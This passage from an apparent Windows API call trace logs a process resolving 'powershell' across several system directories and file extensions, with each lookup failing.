	[0813.883] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c6bdc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0813.883] SetErrorMode (uMode=0x1) returned 0x1
	[0813.883] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSH", lpFindFileData=0x1c6bdde0 | out: lpFindFileData=0x1c6bdde0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0813.883] SetErrorMode (uMode=0x1) returned 0x1
	[0813.884] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c6bdc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0813.884] SetErrorMode (uMode=0x1) returned 0x1
	[0813.884] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.MSC", lpFindFileData=0x1c6bdde0 | out: lpFindFileData=0x1c6bdde0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0813.884] SetErrorMode (uMode=0x1) returned 0x1
	[0813.884] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c6bdc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0813.885] SetErrorMode (uMode=0x1) returned 0x1
	[0813.885] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell", lpFindFileData=0x1c6bdde0 | out: lpFindFileData=0x1c6bdde0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0813.885] SetErrorMode (uMode=0x1) returned 0x1
	[0813.885] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c6bdc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0813.885] SetErrorMode (uMode=0x1) returned 0x1
	[0813.885] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.ps1", lpFindFileData=0x1c6bdde0 | out: lpFindFileData=0x1c6bdde0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0813.886] SetErrorMode (uMode=0x1) returned 0x1
	[0813.886] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c6bdc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0815.197] SetErrorMode (uMode=0x1) returned 0x1
	[0815.197] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psm1", lpFindFileData=0x1c6bdde0 | out: lpFindFileData=0x1c6bdde0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.197] SetErrorMode (uMode=0x1) returned 0x1
	[0815.198] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c6bdc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0815.198] SetErrorMode (uMode=0x1) returned 0x1
	[0815.198] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psd1", lpFindFileData=0x1c6bdde0 | out: lpFindFileData=0x1c6bdde0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.198] SetErrorMode (uMode=0x1) returned 0x1
	[0815.198] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c6bdc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0815.199] SetErrorMode (uMode=0x1) returned 0x1
	[0815.199] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.COM", lpFindFileData=0x1c6bdde0 | out: lpFindFileData=0x1c6bdde0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.199] SetErrorMode (uMode=0x1) returned 0x1
	[0815.199] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c6bdc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0815.199] SetErrorMode (uMode=0x1) returned 0x1
	[0815.199] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.EXE", lpFindFileData=0x1c6bdde0 | out: lpFindFileData=0x1c6bdde0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.200] SetErrorMode (uMode=0x1) returned 0x1
	[0815.200] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c6bdc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0815.200] SetErrorMode (uMode=0x1) returned 0x1
	[0815.200] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.BAT", lpFindFileData=0x1c6bdde0 | out: lpFindFileData=0x1c6bdde0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.200] SetErrorMode (uMode=0x1) returned 0x1
	[0815.201] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c6bdc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0815.201] SetErrorMode (uMode=0x1) returned 0x1
	[0815.201] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.CMD", lpFindFileData=0x1c6bdde0 | out: lpFindFileData=0x1c6bdde0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.201] SetErrorMode (uMode=0x1) returned 0x1
	[0815.201] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c6bdc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0815.202] SetErrorMode (uMode=0x1) returned 0x1
	[0815.202] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBS", lpFindFileData=0x1c6bdde0 | out: lpFindFileData=0x1c6bdde0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.202] SetErrorMode (uMode=0x1) returned 0x1
	[0815.202] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c6bdc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0815.202] SetErrorMode (uMode=0x1) returned 0x1
	[0815.203] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBE", lpFindFileData=0x1c6bdde0 | out: lpFindFileData=0x1c6bdde0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.205] SetErrorMode (uMode=0x1) returned 0x1
	[0815.206] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c6bdc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0815.206] SetErrorMode (uMode=0x1) returned 0x1
	[0815.206] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JS", lpFindFileData=0x1c6bdde0 | out: lpFindFileData=0x1c6bdde0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.206] SetErrorMode (uMode=0x1) returned 0x1
	[0815.206] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c6bdc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0815.210] SetErrorMode (uMode=0x1) returned 0x1
	[0815.211] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JSE", lpFindFileData=0x1c6bdde0 | out: lpFindFileData=0x1c6bdde0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.211] SetErrorMode (uMode=0x1) returned 0x1
	[0815.211] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c6bdc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0815.211] SetErrorMode (uMode=0x1) returned 0x1
	[0815.212] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSF", lpFindFileData=0x1c6bdde0 | out: lpFindFileData=0x1c6bdde0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.212] SetErrorMode (uMode=0x1) returned 0x1
	[0815.212] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c6bdc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0815.212] SetErrorMode (uMode=0x1) returned 0x1
	[0815.212] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSH", lpFindFileData=0x1c6bdde0 | out: lpFindFileData=0x1c6bdde0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.213] SetErrorMode (uMode=0x1) returned 0x1
	[0815.213] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c6bdc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0815.213] SetErrorMode (uMode=0x1) returned 0x1
	[0815.213] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.MSC", lpFindFileData=0x1c6bdde0 | out: lpFindFileData=0x1c6bdde0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.213] SetErrorMode (uMode=0x1) returned 0x1
	[0815.213] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c6bdc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0815.214] SetErrorMode (uMode=0x1) returned 0x1
	[0815.214] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell", lpFindFileData=0x1c6bdde0 | out: lpFindFileData=0x1c6bdde0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.214] SetErrorMode (uMode=0x1) returned 0x1
	[0815.214] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c6bdc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0815.214] SetErrorMode (uMode=0x1) returned 0x1
	[0815.214] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.ps1", lpFindFileData=0x1c6bdde0 | out: lpFindFileData=0x1c6bdde0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.215] SetErrorMode (uMode=0x1) returned 0x1
	[0815.215] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c6bdc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0815.215] SetErrorMode (uMode=0x1) returned 0x1
	[0815.215] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psm1", lpFindFileData=0x1c6bdde0 | out: lpFindFileData=0x1c6bdde0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.215] SetErrorMode (uMode=0x1) returned 0x1
	[0815.215] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c6bdc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0815.216] SetErrorMode (uMode=0x1) returned 0x1
	[0815.216] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psd1", lpFindFileData=0x1c6bdde0 | out: lpFindFileData=0x1c6bdde0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.216] SetErrorMode (uMode=0x1) returned 0x1
	[0815.216] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c6bdc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0815.216] SetErrorMode (uMode=0x1) returned 0x1
	[0815.216] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.COM", lpFindFileData=0x1c6bdde0 | out: lpFindFileData=0x1c6bdde0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.217] SetErrorMode (uMode=0x1) returned 0x1
	[0815.217] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c6bdc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0815.217] SetErrorMode (uMode=0x1) returned 0x1
	[0815.217] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.EXE", lpFindFileData=0x1c6bdde0 | out: lpFindFileData=0x1c6bdde0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.217] SetErrorMode (uMode=0x1) returned 0x1
	[0815.218] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c6bdc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0815.218] SetErrorMode (uMode=0x1) returned 0x1
	[0815.218] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.BAT", lpFindFileData=0x1c6bdde0 | out: lpFindFileData=0x1c6bdde0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.218] SetErrorMode (uMode=0x1) returned 0x1
	[0815.218] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c6bdc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0815.219] SetErrorMode (uMode=0x1) returned 0x1
	[0815.219] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.CMD", lpFindFileData=0x1c6bdde0 | out: lpFindFileData=0x1c6bdde0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.219] SetErrorMode (uMode=0x1) returned 0x1
	[0815.219] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c6bdc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0815.219] SetErrorMode (uMode=0x1) returned 0x1
	[0815.219] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBS", lpFindFileData=0x1c6bdde0 | out: lpFindFileData=0x1c6bdde0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.220] SetErrorMode (uMode=0x1) returned 0x1
	[0815.220] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c6bdc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0815.220] SetErrorMode (uMode=0x1) returned 0x1
	[0815.220] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBE", lpFindFileData=0x1c6bdde0 | out: lpFindFileData=0x1c6bdde0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.220] SetErrorMode (uMode=0x1) returned 0x1
	[0815.220] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c6bdc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0815.221] SetErrorMode (uMode=0x1) returned 0x1
	[0815.221] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JS", lpFindFileData=0x1c6bdde0 | out: lpFindFileData=0x1c6bdde0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.221] SetErrorMode (uMode=0x1) returned 0x1
	[0815.221] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c6bdc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0815.221] SetErrorMode (uMode=0x1) returned 0x1
	[0815.221] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JSE", lpFindFileData=0x1c6bdde0 | out: lpFindFileData=0x1c6bdde0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.222] SetErrorMode (uMode=0x1) returned 0x1
	[0815.222] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c6bdc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0815.222] SetErrorMode (uMode=0x1) returned 0x1
	[0815.222] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSF", lpFindFileData=0x1c6bdde0 | out: lpFindFileData=0x1c6bdde0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.222] SetErrorMode (uMode=0x1) returned 0x1
	[0815.223] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c6bdc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0815.223] SetErrorMode (uMode=0x1) returned 0x1
